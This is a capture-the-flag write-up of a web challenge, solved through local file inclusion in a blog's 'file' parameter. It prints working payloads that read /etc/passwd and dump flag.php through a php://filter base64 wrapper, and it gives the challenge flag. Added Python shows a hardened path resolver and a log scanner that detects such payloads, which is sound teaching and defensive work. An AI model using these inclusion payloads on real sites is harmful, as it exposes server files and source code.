Did you check out my blog posts?
http://ez.ctf.cafe:9999
robots will rule the world!
Let's visit the website.
When you visit http://ez.ctf.cafe:9999/flag.php you will get a hint.
Here it is: How do you filter your coffee?
Okay, good! We can see that we are on the right path. Now let's look at the blog. Click the 'Read More' button on the blog and you will be redirected to `http://ez.ctf.cafe:9999/blog-posts.php?file=blog1.html`
Perfection! You can see there is a `file` parameter. Let's try `/etc/passwd` in that parameter.
`/etc/passwd` in the file parameter (working!). So, now let's find the flag. I tried `flag`, `/home/flag` and `/root/flag`, but had no luck.
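The reason an absolute path is served here is that the `file` parameter reaches the include unchanged. As an added example that is not part of this writeup or of the challenge's own (PHP) code, the Python below emulates that unsafe behaviour beside a hardened resolver that confines the parameter to a posts directory and an allowlist of post names; the directory path and the post names are assumptions made for the example.

```python
import posixpath
import re
from typing import Optional

# Assumed layout for this example; the challenge's real directory is not shown.
POSTS_DIR = "/var/www/html/posts"

# Only the posts the application itself links to may be served (allowlist).
KNOWN_POSTS = {"blog1.html", "blog2.html", "blog3.html"}

# Matches a PHP stream-wrapper prefix such as php://, data://, file://
WRAPPER_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")


def vulnerable_resolve(file_param: str) -> str:
    """Emulates `include($_GET['file'])`: the client-supplied value is used as-is,
    so absolute paths, ../ traversal and php://filter wrappers all reach the include."""
    return file_param


def hardened_resolve(file_param: str) -> Optional[str]:
    """Returns the path to include, or None when the request must be refused."""
    # 1. Stream wrappers are never a blog post: php://filter/... is refused here.
    if WRAPPER_RE.match(file_param):
        return None
    # 2. Absolute paths and NUL bytes are refused before any path joining.
    if file_param.startswith("/") or "\x00" in file_param:
        return None
    # 3. Join under POSTS_DIR and collapse ../ segments lexically.
    candidate = posixpath.normpath(posixpath.join(POSTS_DIR, file_param))
    # 4. After normalisation the result must still sit directly in POSTS_DIR.
    if posixpath.dirname(candidate) != POSTS_DIR:
        return None
    # 5. Even inside the directory, only known post names are served, so a
    #    flag.php sitting next to the posts cannot be pulled in either.
    if posixpath.basename(candidate) not in KNOWN_POSTS:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("blog1.html", "/etc/passwd", "../../../../etc/passwd",
                  "php://filter/convert.base64-encode/resource=flag.php", "flag.php"):
        print(f"{value!r:60} vulnerable={vulnerable_resolve(value)!r:30} "
              f"hardened={hardened_resolve(value)!r}")
```

The allowlist in step 5 is what actually closes the hole; steps 1 to 4 are kept so that the general confinement technique (refuse wrappers and absolute paths, normalise, then check the prefix) is visible for applications that cannot enumerate their files.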
Then I remembered the hint (flag.php) and looked for a payload using PHP filters.
Luckily, I got this one, thanks to PayloadsAllTheThings. Use this payload and boom, you will get a string:
`http://ez.ctf.cafe:9999/blog-posts.php?file=php://filter/convert.base64-encode/resource=flag.php`
Output String: PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K
This is a base64-encoded string; decode it with a base64 decoder.
Decoding the string reveals the flag!!! 🎉
EZ-CTF{LFI_1S_3Z}
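From the defender's side, every request made in this writeup lands in the web server's access log. As an added example that is not part of the writeup or of the challenge, the Python below scans combined-log lines for the three payload shapes used above (an absolute path, URL-encoded `../` traversal, and a `php://` wrapper) and, for the filter payload, recovers the included source from the base64 body the way the decoding step above does. The log lines, client addresses and timestamps are constructed for the example; the base64 string is the one returned on this page.

```python
import base64
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format); not real challenge traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /blog-posts.php?file=blog1.html HTTP/1.1" 200 1432
203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /blog-posts.php?file=/etc/passwd HTTP/1.1" 200 2210
203.0.113.5 - - [01/Jan/2024:10:00:21 +0000] "GET /blog-posts.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2210
203.0.113.5 - - [01/Jan/2024:10:00:40 +0000] "GET /blog-posts.php?file=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 180
198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120
"""

# Body returned for the php://filter request, copied from the writeup above.
FILTER_OUTPUT = (
    "PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8g"
    "RVotQ1RGe0xGSV8xU18zWn0KPz4K"
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
WRAPPER_RE = re.compile(r"^(?P<scheme>[a-z][a-z0-9+.-]*)://", re.I)


def classify_file_param(value: str) -> str:
    """Label one already URL-decoded value of the `file` parameter."""
    m = WRAPPER_RE.match(value)
    if m:
        return "wrapper:" + m.group("scheme").lower()
    if value.startswith("/"):
        return "absolute-path"
    if ".." in value.split("/"):
        return "traversal"
    return "ok"


def scan_log(text: str) -> List[Dict]:
    """Return one finding per request whose `file` parameter is not a plain name."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line we understand
        parts = urlsplit(m.group("target"))
        # parse_qs URL-decodes the values, so %2F arrives here as '/'.
        for value in parse_qs(parts.query, keep_blank_values=True).get("file", []):
            label = classify_file_param(value)
            if label != "ok":
                findings.append({
                    "ip": m.group("ip"),
                    "path": parts.path,
                    "file": value,
                    "label": label,
                    "status": int(m.group("status")),
                })
    return findings


def decode_filter_output(body: str) -> str:
    """Turn the body of a convert.base64-encode response back into source text."""
    return base64.b64decode(body.strip()).decode("utf-8")


def extract_flags(source: str) -> List[str]:
    """Pull EZ-CTF{...} tokens out of recovered source."""
    return re.findall(r"EZ-CTF\{[^}]*\}", source)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['label']:14} {f['file']}")
    print(decode_filter_output(FILTER_OUTPUT))
    print(extract_flags(decode_filter_output(FILTER_OUTPUT)))
```

Note that a 200 status on the traversal and wrapper requests is itself the signal the log gives: the application served them instead of refusing, which is exactly what the resolver fix earlier in the writeup would change.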